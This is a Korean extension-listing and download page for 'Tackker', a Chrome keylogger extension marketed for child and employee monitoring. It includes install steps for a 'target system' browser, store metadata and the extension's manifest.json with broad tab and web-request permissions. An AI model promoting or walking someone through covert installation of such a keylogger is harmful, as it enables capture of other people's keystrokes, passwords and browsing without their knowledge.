Tackker - online keylogger tool

Tackker is online keylogger tool that helps you log the keystrokes and other user data.

Tackker - online keylogger tool란 무엇입니까?

Tackker - online keylogger tool은(는) https://tackker.com에 의해 개발된 Chrome 확장 프로그램으로, 주요 기능은 "Tackker is online keylogger tool that helps you log the keystrokes and other user data."입니다.

확장 프로그램 스크린샷

screenshot
screenshot
screenshot
screenshot

Tackker - online keylogger tool 확장 프로그램 CRX 파일 다운로드

크롬 확장 프로그램을 crx 형식으로 다운로드하여 브라우저에 수동으로 설치하거나 crx 파일을 친구들과 공유하여 쉽게 크롬 확장 프로그램을 설치하세요.

확장 프로그램 사용 설명서

                        tackker is online keylogger tool that helps you log the keystrokes and other user data. It can be used for child monitoring as well as employee monitoring.
Tackker collects your click stream browsing activity - anonymously, for the purpose of analyzing and ensuring the keylogger is running smoothly.

tackker have made browser activity monitoring so easy. Monitor any browser activity by following these simple steps:

1) Install tackker on target system browser(s).
2) After installation, you will be directed to register/login (this part is important since without registering you can not see the logged data).
3) Once you are registered and the plugin is installed , simply monitor user activity from our online dashboard.                    

확장 프로그램 기본 정보

이름 Tackker - online keylogger tool Tackker - online keylogger tool
ID ekpkdmohpdnebfedjjfklhpefgpgaaji
공식 URL https://chromewebstore.google.com/detail/tackker-online-keylogger/ekpkdmohpdnebfedjjfklhpefgpgaaji
설명 Tackker is online keylogger tool that helps you log the keystrokes and other user data.
파일 크기 161 KB
설치 횟수 20,000
현재 버전 1.3
최근 업데이트 2023-10-06
출시 날짜 2020-10-01
평점 4.03/5 총 37 개의 평점
개발자 https://tackker.com
이메일 [email protected]
결제 유형 free
확장 프로그램 웹 사이트 https://www.tackker.com
지원되는 언어 en-US
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "manifest_version": 3,
    "name": "Tackker - online keylogger tool",
    "description": "Tackker is online keylogger tool that helps you log the keystrokes and other user data.",
    "version": "1.3",
    "icons": {
        "128": "tackker-keylogger128.png",
        "48": "tackker-keylogger48.png",
        "16": "tackker-keylogger16.png"
    },
    "action": [],
    "background": {
        "service_worker": "back.js",
        "type": "module"
    },
    "content_scripts": [
        {
            "matches": [
                ""
            ],
            "js": [
                "jquery-3.5.0.min.js",
                "content.js"
            ]
        }
    ],
    "permissions": [
        "alarms",
        "tabs",
        "webRequest",
        "webNavigation",
        "scripting",
        "storage",
        "unlimitedStorage"
    ]
}